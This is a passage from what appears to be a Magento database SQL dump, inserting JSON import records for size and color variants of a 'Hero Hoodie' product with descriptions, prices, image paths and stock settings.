pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"}]');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(2, 'catalog_product', 'append', '{\"100\":{\"sku\":\"MH07-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-S-Gray\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},\"101\":{\"sku\":\"MH07-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-S-Green\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"102\":{\"sku\":\"MH07-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-M-Black\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"103\":{\"sku\":\"MH07-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-M-Gray\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"104\":{\"sku\":\"MH07-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-M-Green\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"105\":{\"sku\":\"MH07-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-L-Black\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"106\":{\"sku\":\"MH07-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-L-Gray\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"107\":{\"sku\":\"MH07-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-L-Green\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"108\":{\"sku\":\"MH07-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & 